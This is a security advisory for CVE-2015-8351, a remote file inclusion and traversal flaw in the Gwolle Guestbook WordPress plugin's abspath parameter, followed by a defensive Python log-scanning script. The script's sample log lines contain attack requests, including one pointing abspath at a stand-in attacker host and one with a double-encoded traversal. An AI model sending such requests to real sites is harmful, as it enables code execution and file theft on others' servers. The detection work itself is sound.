PT-2017-7400 · WordPress · Gwolle Guestbook

Published: 2017-09-11 · Updated: 2018-10-09 · CVE-2015-8351

CVSS v2.0: 6.8 (Medium)

Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
Name of the Vulnerable Software and Affected Versions: Gwolle Guestbook plugin versions prior to 1.5.4
Description: The issue allows remote authenticated users to execute arbitrary PHP code via a URL in the abspath parameter to "frontend/captcha/ajaxresponse.php". The same parameter can also be leveraged to include and execute arbitrary local files via directory traversal sequences, regardless of whether the PHP allow_url_include setting is enabled.
Recommendations: For versions prior to 1.5.4, update to version 1.5.4 or later to resolve the issue. As a temporary workaround, disable the PHP allow_url_include setting to reduce the risk of remote inclusion, and restrict access to the "frontend/captcha/ajaxresponse.php" endpoint. Avoid passing the abspath parameter to the affected endpoint until the issue is resolved.
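The two abuse patterns the description names (a URL scheme in abspath, or directory traversal sequences in it) are easy to pick out of web server access logs while the endpoint restriction above is being put in place. The following detection script is an added example written for this page; it is not code from the advisory or from the Gwolle Guestbook plugin. It assumes Apache/nginx "combined" log format, and the sample log lines, client addresses, hostnames and the /wp-content/plugins/gwolle-gb/ path prefix in them are constructed; only the endpoint name and the abspath parameter come from the advisory.

```python
"""Flag requests that abuse the Gwolle Guestbook abspath parameter.

Added example, not part of the advisory or the plugin. It scans access log
lines for calls to frontend/captcha/ajaxresponse.php whose abspath value
carries a URL scheme (remote inclusion) or a ".." path segment (traversal),
the two patterns the advisory describes.
"""
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Endpoint named in the advisory; matched as a path suffix so the install
# prefix (site root, /wp-content/plugins/<slug>/...) does not matter.
VULNERABLE_ENDPOINT = "frontend/captcha/ajaxresponse.php"

# Assumed Apache/nginx "combined" log format: client, timestamp, request, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Any "scheme://" prefix: http(s), ftp, or a PHP stream wrapper.
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.\-]*://", re.IGNORECASE)

# Constructed sample log (hostnames use the reserved .invalid TLD).
SAMPLE_LOG = [
    # Ordinary guestbook page view: not the affected endpoint.
    '203.0.113.5 - - [11/Sep/2017:10:00:01 +0000] "GET /guestbook/ HTTP/1.1" '
    '200 5120 "-" "Mozilla/5.0"',
    # Affected endpoint, abspath carries a remote URL.
    '198.51.100.7 - - [11/Sep/2017:10:00:02 +0000] "GET /wp-content/plugins/'
    'gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http%3A%2F%2F'
    'attacker.invalid%2F HTTP/1.1" 200 312 "-" "curl/7.55.0"',
    # Affected endpoint, abspath carries a double-encoded "../../".
    '198.51.100.7 - - [11/Sep/2017:10:00:03 +0000] "GET /wp-content/plugins/'
    'gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=%252e%252e%252f'
    '%252e%252e%252f HTTP/1.1" 200 298 "-" "curl/7.55.0"',
    # Affected endpoint, plain absolute path: neither rule fires.
    '203.0.113.9 - - [11/Sep/2017:10:00:04 +0000] "GET /wp-content/plugins/'
    'gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=%2Fvar%2Fwww%2Fhtml'
    '%2F HTTP/1.1" 200 298 "-" "Mozilla/5.0"',
]


def fully_decode(value: str, rounds: int = 3) -> str:
    """Undo up to `rounds` layers of percent-encoding (catches double encoding)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_abspath(value: str) -> Optional[str]:
    """Return 'url_include', 'traversal', or None for one abspath value."""
    normalized = fully_decode(value).replace("\\", "/")
    if SCHEME_RE.match(normalized):
        return "url_include"
    if any(segment == ".." for segment in normalized.split("/")):
        return "traversal"
    return None


def analyze_log(lines: List[str]) -> List[Dict[str, str]]:
    """Return one finding per suspicious abspath value seen on the endpoint."""
    findings = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue  # Not a combined-format line; skip rather than crash.
        target = urlsplit(match.group("target"))
        if not target.path.endswith(VULNERABLE_ENDPOINT):
            continue
        # parse_qs removes one layer of percent-encoding; classify_abspath
        # removes any further layers.
        params = parse_qs(target.query, keep_blank_values=True)
        for raw in params.get("abspath", []):
            kind = classify_abspath(raw)
            if kind is not None:
                findings.append({
                    "ip": match.group("ip"),
                    "ts": match.group("ts"),
                    "status": match.group("status"),
                    "kind": kind,
                    "abspath": fully_decode(raw),
                })
    return findings


if __name__ == "__main__":
    for finding in analyze_log(SAMPLE_LOG):
        print(finding)
```

Run against a real log with `analyze_log(open("access.log").readlines())`. The decoding loop matters: a single `unquote` would leave the double-encoded third line looking like an opaque string, and a 200 status on a flagged request is the line worth following up on.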

Code Injection


Weakness Enumeration

Related Identifiers

CVE-2015-8351

Affected Products

Gwolle Guestbook